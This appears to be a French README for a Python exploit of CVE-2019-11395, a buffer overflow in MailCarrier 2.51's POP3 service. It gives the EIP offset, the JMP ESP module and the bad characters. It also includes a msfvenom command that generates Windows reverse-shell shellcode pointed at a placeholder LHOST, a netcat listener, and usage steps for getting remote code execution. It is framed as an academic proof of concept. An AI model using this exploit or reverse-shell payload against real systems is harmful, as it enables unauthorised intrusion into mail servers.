
Exploit Python pour CVE-2019-11395, un débordement de tampon dans le service POP3 de MailCarrier 2.51. Génère une charge utile de shell inversé via msfvenom et permet l'exécution de code à distance sur des cibles Windows.
La vulnérabilité CVE-2019-11395 décrit une vulnérabilité de dépassement de tampon dans l'application de messagerie MailCarrier 2.51, permettant l'exécution de code à distance. La vulnérabilité se produit dans les processus SMTP RCPT TO, POP3 USER, POP3 LIST, POP3 TOP, ou POP3 RETR.
Lors d'une étude académique, l'accent a été mis sur les processus POP3 pour créer une preuve de concept (PoC). Il a été identifié que l'envoi de 6000 octets à l'application l'empêche de fonctionner, révélant ainsi la vulnérabilité de dépassement de tampon.
msf-pattern_create -l 6000 pour identifier précisément l'EIP.msf-pattern_offset -q 6E47386E -l 6000, résultant en un décalage de 5095.expsrv.dll avec ASLR désactivé, approprié pour un JMP ESP.\x00\x0a\x0d lors des tests de caractères invalides.msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.CVE-2019-11395.py pour accommoder le payload.nc -lnvp 4444 et exécuté l'exploit (CVE-2019-11395.py) pour obtenir l'accès à l'environnement et valider la CVE décrite.Suivez ces étapes pour utiliser l'exploit :
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 exitfunc=thread -f python -b "\x00\x0a\x0d" -v shellcode.msfvenom.CVE-2019-11395.py pour remplacer la variable shellcode par la sortie obtenue de la commande msfvenom.CVE-2019-11395.py) pour obtenir l'accès à l'environnement et valider la CVE décrite.
Visitez mon profil sur LinkedIn